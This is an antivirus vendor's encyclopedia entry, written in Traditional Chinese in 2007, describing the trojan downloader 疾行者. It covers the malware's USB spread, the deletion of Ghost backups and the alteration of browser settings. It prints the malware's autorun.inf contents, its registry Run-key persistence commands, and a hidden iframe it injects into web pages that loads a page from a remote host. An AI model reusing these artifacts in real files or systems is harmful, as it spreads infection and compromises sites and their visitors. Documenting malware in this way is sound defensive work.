名詞釋義
病毒別名: 處理時間:2007-06-22 威脅級別:★
中文名稱:疾行者 病毒類型:木馬 影響系統:Win 9x/ME,Win 2000/NT,Win XP,Win 2003
病毒行為:
這是一個木馬下載病毒,該病毒會刪除被感染機器上的ghost備份檔案,並且嘗試感染腳本檔案,嘗試通過隨身碟傳播把病毒本身傳播出去。連結指定網址,下載其他木馬程式。
傳播途徑
1.%system%\SVSH0ST.EXE
%system%\Autorun.inf
2.病毒把本身拷貝到每個盤符下面並且命名為來lcg.exe,並且創建autorun.inf檔案,內容如下:
[AutoRun]
open=lcg.exe
shell\open=打開(&O)
shell\open\Command=lcg.exe
shell\open\Default=1
shell\explore=資源管理器(&X)
shell\explore\Command=lcg.EXE
3.創建互斥量"niux"
3.運行創建進程運行下面的命令:
reg.exe
"ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V svchost /T REG_SZ /D "
"ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V svchost /T REG_SZ /D C:\\WINNT\\System32\\SVSH0ST.EXE /F"
"add \"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\" /v \"Start Page\" /t REG_EXPAND_SZ /d /f"
"add \"HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\" /v \"HomePage\" /t REG_DWORD /d 00000001 /f"
4.枚舉所有當前視窗,如果發現視窗信息中含有以下字元,就關閉該視窗:
"病毒"
5.遍歷所有的盤符,如果檔案後綴名為.GHO檔案(ghost備份檔案),則刪除該檔案,如果檔案名稱中含有以下的
INDEX.ASP
.HTM
INDEX.PHP
DEFAULT.ASP
DEFAULT.PHP
CONN.ASP
之一的責嘗試在檔案末尾插入代碼:
<iframe src=http://*/test.htm width=0 height=0>< / iframe >
